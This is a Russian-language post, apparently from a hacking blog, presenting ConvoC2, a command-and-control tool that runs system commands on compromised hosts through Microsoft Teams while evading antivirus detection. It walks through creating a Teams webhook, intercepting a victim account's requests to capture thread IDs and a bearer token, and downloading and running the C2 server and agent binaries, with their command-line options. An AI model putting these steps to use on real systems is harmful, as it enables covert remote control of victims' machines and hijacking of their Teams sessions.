December 22

Convo C2

Инфраструктура C2, позволяющая сотрудникам Red Team выполнять системные команды на скомпрометированных хостах с помощью Microsoft Teams.

Привязывает URL-адреса изображений, запуская внешние запросы к серверу C2. Отсутствие прямой связи между жертвой и злоумышленником в сочетании с тем фактом, что жертва отправляет только http-запросы на серверы Microsoft, а антивирусы не просматривают лог-файлы MS Teams, затрудняет обнаружение.

Установка:

1. Создайте командный канал с помощью Webhook для входящих сообщений рабочего процесса

2. Щелкните правой кнопкой мыши на трех точках, затем выберите "Рабочие процессы"

3. В строке поиска введите "Webhook" и нажмите на "Опубликовать на канале, когда будет получен запрос webhook"

4. Продолжайте использовать настройки по умолчанию и, наконец, скопируйте URL-адрес

Теперь необходимо получить идентификаторы и токен аутентификации:

1. Поиск "жертвы"

2. После выбора учетной записи жертвы, когда веб-прокси-сервер перехватывает запросы, вы можете отправить фиктивное сообщение

3. Сохраните два идентификатора, указанные в запросе api/chatsvc/emea/v1/threads, а затем УДАЛИТЕ запрос. Токен аутентификации будет являться токеном-носителем того же запроса.

Использование:

Сервер:

wget https://github.com/cxnturi0n/convoC2/releases/download/v0.1.0-alpha/convoC2_server_amd64.tar.gz
tar -xzvf convoC2_server_amd64.tar.gz --one-top-level
Command: convoC2_server_amd64 -h
Usage of convoC2 server:
  -t, --msgTimeout  How much to wait for command output (default 30 s)
  -b, --bindIp      Bind IP address (default 0.0.0.0)

Клиент:

wget https://github.com/cxnturi0n/convoC2/releases/download/v0.1.0-alpha/convoC2_agent.tar.gz
tar -xzvf convoC2_agent.tar.gz --one-top-level
Command: convoC2_agent.exe -h
Usage of convoC2 agent:
  -v, --verbose   Verbose logging (default false)
  -s, --server    C2 server URL (i.e. http://10.11.12.13/)
  -t, --timeout   Teams log file polling timeout [s] (default 1)
  -w, --webhook   Teams Webhook POST URL
  -r, --regex     Regex to match command (default "<span[^>]*aria-label=\"([^\"]*)\"[^>]*></span>")

*Инструкция также дублированы в архив на случай удаления основной темы на github.

Download | Github